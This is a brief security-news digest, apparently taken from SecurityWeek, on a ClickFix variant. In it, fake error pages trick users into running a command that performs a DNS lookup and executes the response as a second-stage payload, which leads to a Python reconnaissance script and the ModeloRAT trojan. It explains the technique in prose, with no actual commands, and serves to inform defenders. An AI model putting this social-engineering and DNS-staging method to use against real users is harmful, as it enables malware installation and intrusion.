"The initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver. The output is filtered to extract the 'Name:' DNS response, which is executed as the second-stage payload," Microsoft explained. This tactic enables the attacker to reach their infrastructure and validate execution of the second-stage payload, increasing their chances of evading detection by blending malicious traffic into regular network traffic. The second-stage payload downloads and executes a malicious Python script designed for reconnaissance."
"The attack involves attackers displaying a fake error message on a compromised or malicious site. The message instructs the target to address the issue by pressing specific keys, then performing additional steps (eg, running a command). By following the attacker's instructions, the user unknowingly grants elevated permissions, downloads malware, or executes attacker-supplied scripts. In a recent ClickFix attack observed by Microsoft the attacker asked targets to run a command that executes a custom DNS lookoup."
Threat actors are leveraging a new ClickFix variant that displays fake error messages on compromised or malicious sites to trick users into pressing keys and running commands. Attackers instruct targets to run a command that performs a DNS lookup against a hard-coded external DNS server; the output is filtered to extract a 'Name:' response and executed as a second-stage payload. This allows attackers to reach their infrastructure and blend malicious traffic with normal network traffic to evade detection. The second-stage downloads and runs a malicious Python reconnaissance script, drops a final ModeloRAT remote access trojan, and establishes persistence. Some campaigns, tracked as KongTuke, targeted corporate environments.
Read at SecurityWeek
Unable to calculate read time
Collection
[
|
...
]